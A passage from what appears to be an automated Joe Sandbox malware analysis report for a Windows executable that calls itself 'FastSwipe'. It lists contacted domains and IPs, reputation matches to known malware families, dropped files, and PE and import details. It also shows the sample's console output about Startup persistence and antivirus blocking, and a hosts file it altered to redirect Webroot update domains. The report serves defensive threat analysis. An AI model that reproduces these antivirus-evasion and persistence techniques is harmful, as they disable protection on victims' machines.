                                http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-aIPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://grabify.link/IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://grabify.link/FIPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.google.com/IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.26.8.202
                                        		grabify.linkUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        172.67.161.186
                                        		grabify.worldUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        52.173.151.229
                                        		stopify.coUnited States
                                        		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        142.250.141.104
                                        		www.google.comUnited States
                                        		15169GOOGLEUSfalse
                                        142.251.2.101
                                        		google.comUnited States
                                        		15169GOOGLEUSfalse

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1430905
                                        Start date and time:2024-04-24 10:53:40 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 22s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:14
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:IPrstVM17M.exe
                                        (renamed file extension from none to exe, renamed because original name is a hash value)
                                        Original Sample Name:3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
                                        Detection:MAL
                                        Classification:mal64.adwa.evad.winEXE@16/4@5/5
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 14
                                        • Number of non-executed functions: 17
                                        Cookbook Comments:
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        10:55:14API Interceptor688x Sleep call for process: IPrstVM17M.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        104.26.8.202file.exeGet hashmaliciousGlupteba, GuLoader, Socks5Systemz, StealcBrowse
                                          ACEUpF30qq.htaGet hashmaliciousUnknownBrowse
                                            XqESmKfu19.exeGet hashmaliciousUnknownBrowse
                                              KiwiX.bin.exeGet hashmaliciousAsyncRATBrowse
                                                https://grabify.link/requirments.php?Get hashmaliciousUnknownBrowse
                                                  172.67.161.186JYHtfExdx6.exeGet hashmaliciousFormBookBrowse
                                                  • www.installmentloanshq.com/ce0a/?4h=UuZmUqRMH79D5JO2D7nYh8gOqfd7QfKHpeygh9jB8f7tAkZ5ELnxTHHWZi7Zs3Oo8EtT&WJBpR=4hiP82cp3Z4
                                                  52.173.151.229KiwiX.bin.exeGet hashmaliciousAsyncRATBrowse

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    grabify.worldKiwiX.bin.exeGet hashmaliciousAsyncRATBrowse
                                                    • 188.114.96.7
                                                    grabify.linkztn2ByCTBW.htaGet hashmaliciousUnknownBrowse
                                                    • 104.26.9.202
                                                    xxkNTwMqKe.htaGet hashmaliciousUnknownBrowse
                                                    • 104.26.9.202
                                                    5M3d1ZVA6s.htaGet hashmaliciousUnknownBrowse
                                                    • 172.67.68.246
                                                    N1rZQYFxPb.htaGet hashmaliciousUnknownBrowse
                                                    • 104.26.9.202
                                                    x0cuT4GXiQ.htaGet hashmaliciousUnknownBrowse
                                                    • 104.26.9.202
                                                    ACEUpF30qq.htaGet hashmaliciousUnknownBrowse
                                                    • 104.26.8.202
                                                    G28nz6ukRd.htaGet hashmaliciousUnknownBrowse
                                                    • 104.26.9.202
                                                    XqESmKfu19.exeGet hashmaliciousUnknownBrowse
                                                    • 104.26.9.202
                                                    XqESmKfu19.exeGet hashmaliciousUnknownBrowse
                                                    • 104.26.8.202
                                                    KiwiX.bin.exeGet hashmaliciousAsyncRATBrowse
                                                    • 172.67.68.246

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSQUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.200.96
                                                    http://web-hosts.ioGet hashmaliciousUnknownBrowse
                                                    • 172.66.40.168
                                                    DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                    • 104.21.65.24
                                                    SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtfGet hashmaliciousRemcosBrowse
                                                    • 172.67.215.45
                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.phpGet hashmaliciousUnknownBrowse
                                                    • 104.21.91.122
                                                    M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                    • 172.67.139.220
                                                    https://220420241.blob.core.windows.net/web/index.html?id=999Get hashmaliciousUnknownBrowse
                                                    • 1.1.1.1
                                                    CLOUDFLARENETUSQUOTATION_APRQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.200.96
                                                    http://web-hosts.ioGet hashmaliciousUnknownBrowse
                                                    • 172.66.40.168
                                                    DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                    • 104.21.65.24
                                                    SecuriteInfo.com.Exploit.ShellCode.69.19968.913.rtfGet hashmaliciousRemcosBrowse
                                                    • 172.67.215.45
                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    https://c51k11nyj56k.pettisville.sbs/lander/FileRotator_ID428/download.phpGet hashmaliciousUnknownBrowse
                                                    • 104.21.91.122
                                                    M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.74.152
                                                    rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                    • 172.67.139.220
                                                    https://220420241.blob.core.windows.net/web/index.html?id=999Get hashmaliciousUnknownBrowse
                                                    • 1.1.1.1
                                                    MICROSOFT-CORP-MSN-AS-BLOCKUShttps://220420241.blob.core.windows.net/web/index.html?id=999Get hashmaliciousUnknownBrowse
                                                    • 20.150.111.100
                                                    URGENTE_NOTIFICATION.cmdGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 13.107.139.11
                                                    https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                    • 13.107.213.69
                                                    OKhCyJ619J.rtfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 13.107.137.11
                                                    #U5c97#U4f4d#U8865#U52a9#U5236#U5ea6.docx.docGet hashmaliciousUnknownBrowse
                                                    • 52.184.66.142
                                                    fu56fbrtn8.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                    • 13.107.139.11
                                                    Payment MT103.xlsGet hashmaliciousUnknownBrowse
                                                    • 13.107.246.69
                                                    Ref_Order04.xlsGet hashmaliciousUnknownBrowse
                                                    • 13.107.213.69
                                                    FT. 40FE CNY .xlsx.lnkGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                    • 13.107.139.11
                                                    3Shape Unite Installer.exeGet hashmaliciousUnknownBrowse
                                                    • 40.67.232.186

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    37f463bf4616ecd445d4a1937da06e19SUwX12D2S6.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    Zapytanie ofertowe Fl#U00e4ktGroup 04232024.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    file.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    Umulighed.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229
                                                    transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 172.67.161.186
                                                    • 104.26.8.202
                                                    • 52.173.151.229

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Temp\bin.exe

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):73237
                                                    Entropy (8bit):6.275833047225726
                                                    Encrypted:false
                                                    SSDEEP:1536:Ay2wpOqmXZ879wlQd0pBbgUuQF8uHBx7ghY4Mmw0F:N2oIZ879wlQd0pyihFkdwW
                                                    MD5:2726B9EE080DEA41D8DEA4DE53279509
                                                    SHA1:DEFA62A1F3C7C252ACD1B1F9E4BE600EAE52536B
                                                    SHA-256:E71825C9202FE3720A194FF7FFB55516270F7BE69C0F508DBE3DE083B3A3F7BC
                                                    SHA-512:9E9D3A6A69F333036EE7DDE38A69F1F7FA11A86998BD0976266D81098BDB2BE3597C80354806024BC5EFED99AC95FE40C3ED6246F60C3A93F48E13C461E536D4
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Reputation:low
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..o0..<0..<0..<9.^<"..<%..=<..<%..=1..<%..=*..<%..=4..<{..=5..<0..<...<...=1..<..2<1..<...=1..<Rich0..<........................PE..L.....'f...............%.....p......g.............@..........................P............@.................................t........0.......................@..T.......p...............................@...............(............................text............................... ..`.rdata...W.......X..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..T....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\bin.exe:Zone.Identifier

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                    C:\Windows\System32\drivers\etc\hosts

                                                    Download File
                                                    Process:C:\Users\user\Desktop\IPrstVM17M.exe
                                                    File Type:ASCII text, with very long lines (3147), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):3971
                                                    Entropy (8bit):4.321245594540632
                                                    Encrypted:false
                                                    SSDEEP:48:vDZhyoZWM9rU5fFcwp2G//ReQh+35tuXM1S3jJVAE:vDZEurK97/YXVA
                                                    MD5:BEA6BA8E039E02B49E0987A62824BF80
                                                    SHA1:D04118711201A215B076607456173CB3E8965865
                                                    SHA-256:2CF6B8D3DE36B86AFB4E4D279D27018FE13356E5BB89D0593883DD1717DADCA0
                                                    SHA-512:BA0EA7E7EE73238057D769B320E539F21B5745A41618839FEC2EF0E6339F92C04D0226D5C36AA15DF4436C9DF4660B80CE676328A017B4473DC9F055764F9269
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost..1.1.1.1 mail.webroot.com1.1.1.1 carbonite.webroot.com1.1.1.1 e.webroot.com1.1.1.1 entupdates-cdn.webroot.com1.1.1.1 lp-carbonite.webroot.com1.1.1.1 lp.webroot.com1.1.1.1 techne

                                                    \Device\ConDrv

                                                    Download File
                                                    Process:C:\Users\user\Desktop\IPrstVM17M.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5094
                                                    Entropy (8bit):4.1748406171046035
                                                    Encrypted:false
                                                    SSDEEP:96:UHJQajVYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYc:UzVYYYYYYYYYYYYYYYYYYYYYYYYYYYY4
                                                    MD5:768B7C3E4130FCA1D2B435DFD57C6C05
                                                    SHA1:1ECB0F51C5CA128089CDB9F344E23F2F63A3C8C6
                                                    SHA-256:6914FE74FB52D7CD8F9C4ACA781EB5CAAC1F70C80F8375363D3920AE308045C1
                                                    SHA-512:255310416B89E16B1E162EBEDA494861DB352C10C91DE1DBF350AA1747D3C185FF73C9EE2A988D116E59E469728E07BA52131B70B9A182736E7063133F90C531
                                                    Malicious:false
                                                    Preview:Welcome to FastSwipe!..No6po noxanobatb b FastSwipe!..Executable path: C:\Users\user\Desktop\IPrstVM17M.exe..Startup path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup..Text appended to executable successfully...Started blocking antiviruses...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable successfully...Text appended to executable succes

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Entropy (8bit):6.275682581179545
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:IPrstVM17M.exe
                                                    File size:73'228 bytes
                                                    MD5:a23b11e50c1f6fcdb42d3b2582524e2f
                                                    SHA1:8b54ea0bc8e4545759e0ea82d28fd608fe0d97ee
                                                    SHA256:3b3e9249075fce915a1671b47e2f4d164d835ab5d425f3aae2502c41409f6448
                                                    SHA512:a50d34f6a4d5aceaa27d20634929261891475e846f3df709196d0c5a31ff7399593531f452eff02436b526d359917382aa22b3a766d54514dc5d08a5fc3d0ac3
                                                    SSDEEP:1536:Ay2wpOqmXZ879wlQd0pBbgUuQF8uHBx7ghY4Mmw0F:N2oIZ879wlQd0pyihFkdwo
                                                    TLSH:1663A713FF5DC675D08142F4E1AD9BA5926AE1228F9087D377C0562ABC644CBAC7CE0B
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t..o0..<0..<0..<9.^<"..<%..=<..<%..=1..<%..=*..<%..=4..<{..=5..<0..<...<...=1..<..2<1..<...=1..<Rich0..<.......................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x409d67
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows cui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x6627D6D0 [Tue Apr 23 15:42:08 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:6346f6c5e6508c2748278d42ee15349a

                                                    Entrypoint Preview

                                                    Instruction
                                                    call 00007F920903A1F2h
                                                    jmp 00007F9209039A89h
                                                    retn 0000h
                                                    push ebp
                                                    mov ebp, esp
                                                    push 00000000h
                                                    call dword ptr [0040C02Ch]
                                                    push dword ptr [ebp+08h]
                                                    call dword ptr [0040C050h]
                                                    push C0000409h
                                                    call dword ptr [0040C030h]
                                                    push eax
                                                    call dword ptr [0040C004h]
                                                    pop ebp
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    sub esp, 00000324h
                                                    push 00000017h
                                                    call dword ptr [0040C040h]
                                                    test eax, eax
                                                    je 00007F9209039C17h
                                                    push 00000002h
                                                    pop ecx
                                                    int 29h
                                                    mov dword ptr [004123B8h], eax
                                                    mov dword ptr [004123B4h], ecx
                                                    mov dword ptr [004123B0h], edx
                                                    mov dword ptr [004123ACh], ebx
                                                    mov dword ptr [004123A8h], esi
                                                    mov dword ptr [004123A4h], edi
                                                    mov word ptr [004123D0h], ss
                                                    mov word ptr [004123C4h], cs
                                                    mov word ptr [004123A0h], ds
                                                    mov word ptr [0041239Ch], es
                                                    mov word ptr [00412398h], fs
                                                    mov word ptr [00412394h], gs
                                                    pushfd
                                                    pop dword ptr [004123C8h]
                                                    mov eax, dword ptr [ebp+00h]
                                                    mov dword ptr [004123BCh], eax
                                                    mov eax, dword ptr [ebp+04h]
                                                    mov dword ptr [004123C0h], eax
                                                    lea eax, dword ptr [ebp+08h]
                                                    mov dword ptr [004123CCh], eax
                                                    mov eax, dword ptr [ebp-00000324h]
                                                    mov dword ptr [00412308h], 00000001h

                                                    Rich Headers

                                                    Programming Language:
                                                    • [IMP] VS2008 SP1 build 30729

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x103740x118.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xd54.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xe8800x70.rdata
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xe7c00x40.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0xc0000x228.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000xac140xae000a6cf3ca9aab97c3945340ea96eeba0bFalse0.4121318247126437data6.075701740434012IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0xc0000x57b20x580036910fa3b6c93981105a9e4949db13e5False0.39013671875data5.345781927472322IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x120000x6180x40031b29ec5fef7b92285f2e1c6e698421dFalse0.1943359375data3.355014347282592IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0x140000xd540xe007db76f241f35b5943c7810ce1cb407afFalse0.8077566964285714data6.501155290110054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                    Imports

                                                    DLLImport
                                                    KERNEL32.dllGetModuleFileNameA, TerminateProcess, GetEnvironmentVariableA, OpenProcess, CreateToolhelp32Snapshot, Sleep, GetLastError, Process32NextW, Process32FirstW, CloseHandle, IsDebuggerPresent, SetUnhandledExceptionFilter, GetCurrentProcess, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, IsProcessorFeaturePresent, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, UnhandledExceptionFilter
                                                    WININET.dllInternetOpenW, InternetCloseHandle, InternetOpenUrlW
                                                    MSVCP140.dll?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z, ?_Xlength_error@std@@YAXPBD@Z, ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ, ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?in@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z, ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UAE@XZ, ?good@ios_base@std@@QBE_NXZ, ??7ios_base@std@@QBE_NXZ, ?always_noconv@codecvt_base@std@@QBE_NXZ, ??Bid@locale@std@@QAEIXZ, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@H@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ, ?uncaught_exception@std@@YA_NXZ
